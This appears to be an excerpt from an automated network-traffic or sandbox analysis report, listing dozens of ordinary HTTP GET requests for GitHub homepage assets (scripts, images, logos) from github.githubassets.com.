Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-9a8cd2-373766bf71f1.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/ui_packages_updatable-content_updatable-content_ts-3f4401350bd7.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-ab87c1d6c5c8.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/app_assets_modules_github_sticky-scroll-into-view_ts-112600808cf9.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-d0d0a6-6faacedf87fe.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-aeae6fcdf371.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/behaviors-b32b736e8b72.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-bf7e5a3732fd.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/notifications-global-54f34167118d.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_delegated-events_dist_in-bae876-1e5b19a38261.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/marketing-872ff8663359.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/marketing-experiments-6794cdd7dce1.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/home-fa7c9cc8a53c.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/webgl-globe-b8ac95da6496.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_webgl-globe_dist_js_main_js-7ace716f3606.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/react-lib-7b7b5264f6c1.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_primer_react_lib-esm_Fea-39267a-9ffd541aafbc.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-f36ad879d477.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_js-e39b44f27fbb.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js-540a2acf621f.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_KeybindingHint_KeybindingHint_js-node_modules_githu-3fe5e5-779b0a7957e4.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_Dialog_Dialog_js-node_modules_primer_react_lib-esm_-34d71e-a36ca1cac968.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/ui_packages_react-core_create-browser-history_ts-ui_packages_react-core_AppContextProvider_ts-ffb979-ed6ff1fbeca4.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/keyboard-shortcuts-dialog-3d3b90edc171.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/sessions-f3ddee0032e4.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-9a621ecbf672.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/thumbnail-31b2a20df6fc.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/play-1844e8414ade.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/hero-desktop-a38b0fd77b6c.webp HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/hero-mobile-7163f4f5de41.webp HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/3m-0151c2fda0ce.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/kpmg-c249f20c5173.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/sap-96248a56d312.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/mercedes-fcf97d2d6ec4.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/pg-f1f19955c4e4.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/telus-df0c2109df99.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/shape-0-df97fa6b0c27.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-copilot-editor-6474457a5b19.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/shape-1-c219318e479a.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/git-branch-productivity-c304b83d09c7.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-copilot-sidebar-3d2efb504577.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/bg-glow-purple-6e9a6a96cb04.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-actions-2-c5178134f381.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-codespaces-1d2d17e8b2b7.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-mobile-chat-9e7549906574.webp HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/shape-2-f30dcc9bd35c.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/git-branch-security-2-f6a799957581.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-ghas-list-84af1f1ce2b8.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/bg-glow-blue-036b8dc2d1ce.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-dependabot-d98c73cc6724.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-code-scanning-fc9dfb212aa3.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/shape-3-9e542b5c31b8.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-secret-scanning-2-88fb429376d6.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/git-branch-collaboration-2-e46b1fb1d363.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/issues-plan-2-46d1ce1d4519.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-projects-2-26077f1dd188.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-discussions-2-b915a6dd867e.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-pull-requests-2-280cc958fc05.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/directus-4da9e46da0ac.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/commandpost-18d45fffda67.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/chaynhq-4c5953025dca.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/imolorhe-9d771b1d4332.jpeg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
